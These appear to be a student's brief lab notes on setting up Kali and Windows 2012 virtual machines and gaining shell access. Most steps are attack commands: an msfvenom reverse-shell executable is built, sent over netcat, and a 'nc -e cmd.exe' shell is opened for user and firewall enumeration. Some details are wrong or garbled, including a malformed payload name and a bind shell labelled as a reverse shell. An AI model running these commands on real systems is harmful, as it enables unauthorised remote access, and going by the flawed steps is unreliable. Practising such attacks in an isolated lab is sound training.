Project 1 - Setting up Virtual Machine

1. Successfully installed two virtual machines klai and windows 2012

a. using ipconfig to get ip of windows machine

b. using ifconfig to get ip of kali

2.using the command of

msfvenom -p windows_reverse_tcp LHOST=192.168.1.110 LPORT=4444 -f exe > shell.exe

once done check with ls command to show the exe file in kali

3.To send a payload to windows from kali

in kali: nc -w 3 192.168.1.110 7555 < shell.exe

in windows: nc -l -p 7555 > shell.exe

and using dir command to show the file

4.Gain reverse shell access to the Windows server from the Kali attacker machine on port 4444

in windows : nc -lvp 4444 -e cmd.exe

in kali : nc 192.168.1.110 4444

once get an access using net user command to know uswer of windows

5. from above process in kali using netsh > firewall > show state command get the staus of firewall
